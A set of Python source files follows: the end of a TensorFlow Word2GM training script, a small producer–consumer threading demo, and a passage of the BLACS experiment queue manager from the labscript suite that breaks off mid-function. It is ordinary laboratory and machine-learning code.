self.saver = tf.train.Saver(max_to_keep=opts.max_to_keep)
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
# This is where the optimizer that minimizes loss (self._train) is run
if not self._options.normclip:
_, epoch = self._session.run([self._train, self._epoch])
else:
_, epoch, _ = self._session.run([self._train, self._epoch, self._clip_ops])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(opts.save_path, self._session.graph)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
step_manual = 0
while True:
time.sleep(opts.statistics_interval) # Reports our progress once a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\n" %
(epoch, step, lr, loss, rate), end="")
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
step_manual += 1
for t in workers:
t.join()
return epoch
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
if not FLAGS.train_data or not FLAGS.save_path:
print("--train_data and --save_path must be specified.")
sys.exit(1)
if not os.path.exists(FLAGS.save_path):
print('Creating new directory', FLAGS.save_path)
os.makedirs(FLAGS.save_path)
else:
print('The directory already exists', FLAGS.save_path)
opts = Options()
print('Saving results to {}'.format(opts.save_path))
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2GMtrainer(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train()
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
with tf.variable_scope('', reuse=tf.AUTO_REUSE):
sigmas = session.run(tf.get_variable("sigma"))
mus = session.run(tf.get_variable("mu"))
np.save("sigma.npy", sigmas)
np.save("mu.npy", mus)
if __name__ == "__main__":
tf.app.run()
|
multithreads6.py
|
import time, random
import queue, threading
q = queue.Queue()
def Producer(name):
    count = 0
    while count < 10:
        print("Making buns...")
        time.sleep(random.randrange(3))
        q.put(count)
        print('Producer %s produced bun %s..' % (name, count))
        count += 1
def Consumer(name):
    count = 0
    while count < 10:
        time.sleep(random.randrange(4))
        print('Waiting for a bun...')
        data = q.get()
        # the consumer, not the producer, marks the item as processed;
        # this is what lets q.join() unblock once everything is consumed
        q.task_done()
        print('Consumer %s consumed bun %s...' % (name, data))
        count += 1
c1 = threading.Thread(target=Producer, args=('小明',), daemon=True)
c2 = threading.Thread(target=Consumer, args=('小花',), daemon=True)
c3 = threading.Thread(target=Consumer, args=('小灰',), daemon=True)
c4 = threading.Thread(target=Consumer, args=('小天',), daemon=True)
c1.start()
c2.start()
c3.start()
c4.start()
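# Editor's addition (sketch): block until the producer finishes and the
# consumers have processed every queued item, then exit; the still-blocked
# daemon consumer threads are discarded when the process ends.
c1.join()
q.join()
print('All buns consumed, exiting')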
|
experiment_queue.py
|
#####################################################################
# #
# /experiment_queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import queue
import logging
import os
import threading
import time
import datetime
import sys
import shutil
from collections import defaultdict
from tempfile import gettempdir
from binascii import hexlify
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
from labscript_utils.ls_zprocess import ProcessTree
process_tree = ProcessTree.instance()
import labscript_utils.h5_lock, h5py
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
from labscript_utils.connections import ConnectionTable
import labscript_utils.properties
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
import blacs.plugins as plugins
def tempfilename(prefix='BLACS-temp-', suffix='.h5'):
"""Return a filepath appropriate for use as a temporary file"""
random_hex = hexlify(os.urandom(16)).decode()
return os.path.join(gettempdir(), prefix + random_hex + suffix)
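# Editor's usage sketch (hypothetical output):
#   >>> tempfilename(prefix='demo-', suffix='.h5')
#   '/tmp/demo-3f9a0c...d41.h5'   # 32 hex chars from os.urandom(16)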
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
def __init__(self,*args,**kwargs):
QTreeView.__init__(self,*args,**kwargs)
self.header().setStretchLastSection(True)
self.setAutoScroll(False)
self.add_to_queue = None
self.delete_selection = None
self._logger = logging.getLogger('BLACS.QueueManager')
def keyPressEvent(self,event):
if event.key() == Qt.Key_Delete:
event.accept()
if self.delete_selection:
self.delete_selection()
QTreeView.keyPressEvent(self,event)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
for url in event.mimeData().urls():
path = str(url.toLocalFile())
if path.endswith('.h5') or path.endswith('.hdf5'):
self._logger.info('Acceptable file dropped. Path is %s'%path)
if self.add_to_queue:
self.add_to_queue(str(path))
else:
                        self._logger.info('Dropped file not added to queue because there is no access to the necessary add_to_queue method')
else:
self._logger.info('Invalid file dropped. Path was %s'%path)
else:
event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
def __init__(self, BLACS, ui):
self._ui = ui
self.BLACS = BLACS
self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
self._manager_running = True
self._manager_paused = False
self._manager_repeat = False
self._manager_repeat_mode = self.REPEAT_ALL
self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
self._logger = logging.getLogger('BLACS.QueueManager')
# Create listview model
self._model = QStandardItemModel()
self._create_headers()
self._ui.treeview.setModel(self._model)
self._ui.treeview.add_to_queue = self.process_request
self._ui.treeview.delete_selection = self._delete_selected_items
# set up buttons
self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
self._ui.queue_push_up.clicked.connect(self._move_up)
self._ui.queue_push_down.clicked.connect(self._move_down)
self._ui.queue_push_to_top.clicked.connect(self._move_top)
self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
# Set the elision of the status labels:
elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
# Set up repeat mode button menu:
self.repeat_mode_menu = QMenu(self._ui)
self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
self.repeat_mode_menu.addAction(self.action_repeat_all)
self.repeat_mode_menu.addAction(self.action_repeat_last)
self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
# The button already has an arrow indicating a menu, don't draw another one:
self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
self.manager = threading.Thread(target = self.manage)
self.manager.daemon=True
self.manager.start()
def _create_headers(self):
self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
def restore_save_data(self,data):
if 'manager_paused' in data:
self.manager_paused = data['manager_paused']
if 'manager_repeat' in data:
self.manager_repeat = data['manager_repeat']
if 'manager_repeat_mode' in data:
self.manager_repeat_mode = data['manager_repeat_mode']
if 'files_queued' in data:
file_list = list(data['files_queued'])
self._model.clear()
self._create_headers()
for file in file_list:
self.process_request(str(file))
if 'last_opened_shots_folder' in data:
self.last_opened_shots_folder = data['last_opened_shots_folder']
@property
@inmain_decorator(True)
def manager_running(self):
return self._manager_running
@manager_running.setter
@inmain_decorator(True)
def manager_running(self,value):
value = bool(value)
self._manager_running = value
def _toggle_pause(self,checked):
self.manager_paused = checked
def _toggle_clear(self):
self._model.clear()
self._create_headers()
@property
@inmain_decorator(True)
def manager_paused(self):
return self._manager_paused
@manager_paused.setter
@inmain_decorator(True)
def manager_paused(self,value):
value = bool(value)
self._manager_paused = value
if value != self._ui.queue_pause_button.isChecked():
self._ui.queue_pause_button.setChecked(value)
def _toggle_repeat(self,checked):
self.manager_repeat = checked
@property
@inmain_decorator(True)
def manager_repeat(self):
return self._manager_repeat
@manager_repeat.setter
@inmain_decorator(True)
def manager_repeat(self,value):
value = bool(value)
self._manager_repeat = value
if value != self._ui.queue_repeat_button.isChecked():
self._ui.queue_repeat_button.setChecked(value)
@property
@inmain_decorator(True)
def manager_repeat_mode(self):
return self._manager_repeat_mode
@manager_repeat_mode.setter
@inmain_decorator(True)
def manager_repeat_mode(self, value):
assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
self._manager_repeat_mode = value
button = self._ui.queue_repeat_button
if value == self.REPEAT_ALL:
button.setIcon(QIcon(self.ICON_REPEAT))
elif value == self.REPEAT_LAST:
button.setIcon(QIcon(self.ICON_REPEAT_LAST))
def on_add_shots_triggered(self):
shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if isinstance(shot_files, tuple):
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
if filepath.endswith('.h5'):
self.process_request(str(filepath))
def _delete_selected_items(self):
index_list = self._ui.treeview.selectedIndexes()
while index_list:
self._model.takeRow(index_list[0].row())
index_list = self._ui.treeview.selectedIndexes()
def _move_up(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
def _move_down(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
            # only move the row if it is not the last element, and the row below it is not selected
            # (note that while a row below may have been initially selected, it should by now, be one row lower
            # since we start moving elements of the list downwards starting from the highest index)
if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
                # Add the selected row into a position one below
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
def _move_top(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
def _move_bottom(self):
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
            # only move the row while it is not the last element, and the row below it is not selected
            # (note that while a row below may have been initially selected, it should by now, be one row lower
            # since we start moving elements of the list downwards starting from the highest index)
while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
                # Add the selected row into a position one below
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
@inmain_decorator(True)
def append(self, h5files):
for file in h5files:
item = QStandardItem(file)
item.setToolTip(file)
self._model.appendRow(item)
@inmain_decorator(True)
def prepend(self,h5file):
if not self.is_in_queue(h5file):
self._model.insertRow(0,QStandardItem(h5file))
def process_request(self,h5_filepath):
# check connection table
try:
new_conn = ConnectionTable(h5_filepath, logging_prefix='BLACS')
except Exception:
return "H5 file not accessible to Control PC\n"
result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
if result:
# Has this run file been run already?
with h5py.File(h5_filepath, 'r') as h5_file:
if 'data' in h5_file['/']:
rerun = True
else:
rerun = False
if rerun or self.is_in_queue(h5_filepath):
self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
# Keep counting up until we get a filename that isn't in the filesystem:
while os.path.exists(new_h5_filepath):
new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
if not success:
                    return 'Cannot create a re-run of this experiment. Is it a valid run file?'
self.append([new_h5_filepath])
message = "Experiment added successfully: experiment to be re-run\n"
else:
self.append([h5_filepath])
message = "Experiment added successfully\n"
if self.manager_paused:
message += "Warning: Queue is currently paused\n"
if not self.manager_running:
message = "Error: Queue is not running\n"
return message
else:
# TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
"You may have:\n"
" Submitted your file to the wrong control PC\n"
" Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
" Renamed a channel at the top of your script\n"
" Submitted an old file, and the experiment has since been rewired\n"
"\n"
"Please verify your experiment script matches the current experiment configuration, and try again\n"
"The error was %s\n"%error)
return message
def new_rep_name(self, h5_filepath):
basename, ext = os.path.splitext(h5_filepath)
if '_rep' in basename and ext == '.h5':
reps = basename.split('_rep')[-1]
try:
reps = int(reps)
except ValueError:
# not a rep
pass
else:
                return '_rep'.join(basename.split('_rep')[:-1]) + '_rep%05d.h5' % (reps + 1), reps + 1
return basename + '_rep%05d.h5' % 1, 1
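    # Editor's sketch (hypothetical filenames): new_rep_name() maps
    #   'shot.h5'          -> ('shot_rep00001.h5', 1)
    #   'shot_rep00003.h5' -> ('shot_rep00004.h5', 4)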
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
try:
with h5py.File(h5file, 'r') as old_file:
with h5py.File(new_h5_file, 'w') as new_file:
groups_to_copy = [
'devices',
'calibrations',
'script',
'globals',
'connection table',
'labscriptlib',
'waits',
'time_markers',
'shot_properties',
]
for group in groups_to_copy:
if group in old_file:
new_file.copy(old_file[group], group)
for name in old_file.attrs:
new_file.attrs[name] = old_file.attrs[name]
new_file.attrs['run repeat'] = repeat_number
except Exception:
# raise
self._logger.exception('Clean H5 File Error.')
return False
return True
@inmain_decorator(wait_for_return=True)
def is_in_queue(self,path):
item = self._model.findItems(path,column=FILEPATH_COLUMN)
if item:
return True
else:
return False
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
self._ui.queue_status.setText(str(queue_status))
if shot_filepath is not None:
self._ui.running_shot_name.setText('<b>%s</b>'% str(os.path.basename(shot_filepath)))
else:
self._ui.running_shot_name.setText('')
@inmain_decorator(wait_for_return=True)
def get_status(self):
return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
return str(self._model.takeRow(0)[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
tab = self.BLACS.tablist[name]
if self.get_device_error_state(name,self.BLACS.tablist):
return False
tab.connect_restart_receiver(restart_receiver)
tab.transition_to_buffered(h5file,self.current_queue)
transition_list[name] = tab
return True
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
return device_list[name].error_message
def manage(self):
logger = logging.getLogger('BLACS.queue_manager.thread')
process_tree.zlock_client.set_thread_name('queue_manager')
# While the program is running!
logger.info('starting')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
# This name stores the queue currently being used to
# communicate with tabs, so that abort signals can be put
# to it when those tabs never respond and are restarted by
# the user.
self.current_queue = queue.Queue()
#TODO: put in general configuration
timeout_limit = 300 #seconds
self.set_status("Idle")
while self.manager_running:
# If the pause button is pushed in, sleep
if self.manager_paused:
if self.get_status() == "Idle":
logger.info('Paused')
self.set_status("Queue paused")
time.sleep(1)
continue
# Get the top file
try:
path = self.get_next_file()
self.set_status('Preparing shot...', path)
logger.info('Got a file: %s'%path)
except Exception:
# If no files, sleep for 1s,
self.set_status("Idle")
time.sleep(1)
continue
devices_in_use = {}
transition_list = {}
self.current_queue = queue.Queue()
# Function to be run when abort button is clicked
def abort_function():
try:
# Set device name to "Queue Manager" which will never be a labscript device name
# as it is not a valid python variable name (has a space in it!)
self.current_queue.put(['Queue Manager', 'abort'])
except Exception:
logger.exception('Could not send abort message to the queue manager')
def restart_function(device_name):
try:
self.current_queue.put([device_name, 'restart'])
except Exception:
logger.exception('Could not send restart message to the queue manager for device %s'%device_name)
##########################################################################################################################################
# transition to buffered #
##########################################################################################################################################
try:
# A Queue for event-based notification when the tabs have
# completed transitioning to buffered:
timed_out = False
error_condition = False
abort = False
restarted = False
self.set_status("Transitioning to buffered...", path)
# Enable abort button, and link in current_queue:
inmain(self._ui.queue_abort_button.clicked.connect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,True)
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('pre_transition_to_buffered'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
start_time = time.time()
with h5py.File(path, 'r') as hdf5_file:
devices_in_use = {}
start_order = {}
stop_order = {}
for name in hdf5_file['devices']:
device_properties = labscript_utils.properties.get(
hdf5_file, name, 'device_properties'
)
devices_in_use[name] = self.BLACS.tablist[name]
start_order[name] = device_properties.get('start_order', None)
stop_order[name] = device_properties.get('stop_order', None)
# Sort the devices into groups based on their start_order and stop_order
start_groups = defaultdict(set)
stop_groups = defaultdict(set)
for name in devices_in_use:
start_groups[start_order[name]].add(name)
stop_groups[stop_order[name]].add(name)
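# Devices sharing a start_order are programmed together, and the whole
# group must finish transitioning to buffered before the next group (in
# ascending start_order) begins, as implemented in the loop below.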
while (transition_list or start_groups) and not error_condition:
if not transition_list:
# Ready to transition the next group:
for name in start_groups.pop(min(start_groups)):
try:
# Connect restart signal from tabs to current_queue and transition the device to buffered mode
success = self.transition_device_to_buffered(name,transition_list,path,restart_function)
if not success:
logger.error('%s has an error condition, aborting run' % name)
error_condition = True
break
except Exception:
logger.exception('Exception while transitioning %s to buffered mode.'%(name))
error_condition = True
break
if error_condition:
break
try:
# Wait for a device to transition_to_buffered:
logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s'%str(transition_list))
device_name, result = self.current_queue.get(timeout=2)
#Handle abort button signal
if device_name == 'Queue Manager' and result == 'abort':
# we should abort the run
logger.info('abort signal received from GUI')
abort = True
break
if result == 'fail':
logger.info('abort signal received during transition to buffered of %s' % device_name)
error_condition = True
break
elif result == 'restart':
logger.info('Device %s was restarted, aborting shot.'%device_name)
restarted = True
break
logger.debug('%s finished transitioning to buffered mode' % device_name)
# The tab says it's done, but does it have an error condition?
if self.get_device_error_state(device_name,transition_list):
logger.error('%s has an error condition, aborting run' % device_name)
error_condition = True
break
del transition_list[device_name]
except queue.Empty:
# It's been 2 seconds without a device finishing
# transitioning to buffered. Is there an error?
for name in transition_list:
if self.get_device_error_state(name,transition_list):
error_condition = True
break
if error_condition:
break
# Has programming timed out?
if time.time() - start_time > timeout_limit:
logger.error('Transitioning to buffered mode timed out')
timed_out = True
break
# Handle if we broke out of loop due to timeout or error:
if timed_out or error_condition or abort or restarted:
# Pause the queue, re-add the path to the top of the queue, and set a status message!
# only if we aren't responding to an abort click
if not abort:
self.manager_paused = True
self.prepend(path)
if timed_out:
self.set_status("Programming timed out\nQueue paused")
elif abort:
self.set_status("Aborted")
elif restarted:
self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
else:
self.set_status("Device(s) in error state\nQueue Paused")
# Abort the run for all devices in use:
# need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
self.current_queue = queue.Queue()
for tab in devices_in_use.values():
# We call abort_buffered here because each tab is either in mode=BUFFERED, or
# transition_to_buffered failed, in which case it should have called
# abort_transition_to_buffered itself and returned to manual mode.
# Since abort_buffered will only run in mode=BUFFERED, and the state is not
# queued indefinitely (it is deleted if we are not in mode=BUFFERED),
# this is the correct method call to make in either case.
tab.abort_buffered(self.current_queue)
# We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# disconnect abort button and disable
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE! #
##########################################################################################################################################
# Get front panel data, but don't save it to the h5 file until the experiment ends:
states,tab_positions,window_data,plugin_data = self.BLACS.front_panel_settings.get_save_data()
self.set_status("Running (program time: %.3fs)..."%(time.time() - start_time), path)
# A Queue for event-based notification of when the experiment has finished.
experiment_finished_queue = queue.Queue()
logger.debug('About to start the master pseudoclock')
run_time = datetime.datetime.now()
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_starting'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
#TODO: fix potential race condition if BLACS is closing when this line executes?
self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)
# Wait for notification of the end of run:
abort = False
restarted = False
done = False
while not (abort or restarted or done):
try:
done = experiment_finished_queue.get(timeout=0.5) == 'done'
except queue.Empty:
pass
try:
# Poll self.current_queue for abort signal from button or device restart
device_name, result = self.current_queue.get_nowait()
if (device_name == 'Queue Manager' and result == 'abort'):
abort = True
if result == 'restart':
restarted = True
# Check for error states in tabs
for device_name, tab in devices_in_use.items():
if self.get_device_error_state(device_name,devices_in_use):
restarted = True
except queue.Empty:
pass
if abort or restarted:
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# Disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
if restarted:
self.manager_paused = True
self.prepend(path)
self.set_status("Device restarted during run.\nAborted. Queue paused")
elif abort:
self.set_status("Aborted")
if abort or restarted:
# after disabling the abort button, we now start a new iteration
continue
logger.info('Run complete')
self.set_status("Saving data...", path)
# End try/except block here
except Exception:
logger.exception("Error in queue manager execution. Queue paused.")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode
self.current_queue = queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
self.set_status("Error in queue manager\nQueue paused")
# disconnect and disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE OVER! #
##########################################################################################################################################
finally:
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_over'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Transition to manual #
##########################################################################################################################################
# start new try/except block here
try:
with h5py.File(path,'r+') as hdf5_file:
self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file,states,tab_positions,window_data,plugin_data,save_conn_table=False, save_queue_data=False)
data_group = hdf5_file['/'].create_group('data')
# stamp with the run time of the experiment
hdf5_file.attrs['run time'] = run_time.strftime('%Y%m%dT%H%M%S.%f')
error_condition = False
response_list = {}
# Keep transitioning tabs to manual mode and waiting on them until they
# are all done or have all errored/restarted/failed. If one fails, we
# still have to transition the rest to manual mode:
while stop_groups:
transition_list = {}
# Transition the next group to manual mode:
for name in stop_groups.pop(min(stop_groups)):
tab = devices_in_use[name]
try:
tab.transition_to_manual(self.current_queue)
transition_list[name] = tab
except Exception:
logger.exception('Exception while transitioning %s to manual mode.'%(name))
error_condition = True
# Wait for their responses:
while transition_list:
logger.info('Waiting for the following devices to finish transitioning to manual mode: %s'%str(transition_list))
try:
name, result = self.current_queue.get(timeout=2)
if name == 'Queue Manager' and result == 'abort':
# Ignore any abort signals left in the queue, it is too
# late to abort in any case:
continue
except queue.Empty:
# 2 seconds without a device transitioning to manual mode.
# Is there an error:
for name in transition_list.copy():
if self.get_device_error_state(name, transition_list):
error_condition = True
logger.debug('%s is in an error state' % name)
del transition_list[name]
continue
response_list[name] = result
if result == 'fail':
error_condition = True
logger.debug('%s failed to transition to manual' % name)
elif result == 'restart':
error_condition = True
logger.debug('%s restarted during transition to manual' % name)
elif self.get_device_error_state(name, devices_in_use):
error_condition = True
logger.debug('%s is in an error state' % name)
else:
logger.debug('%s finished transitioning to manual mode' % name)
# Once device has transitioned_to_manual, disconnect restart
# signal:
tab = devices_in_use[name]
inmain(tab.disconnect_restart_receiver, restart_function)
del transition_list[name]
if error_condition:
self.set_status("Error in transtion to manual\nQueue Paused")
except Exception:
error_condition = True
logger.exception("Error in queue manager execution. Queue paused.")
self.set_status("Error in queue manager\nQueue paused")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
if error_condition:
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
continue
##########################################################################################################################################
# Analysis Submission #
##########################################################################################################################################
logger.info('All devices are back in static mode.')
# check for analysis Filters in Plugins
send_to_analysis = True
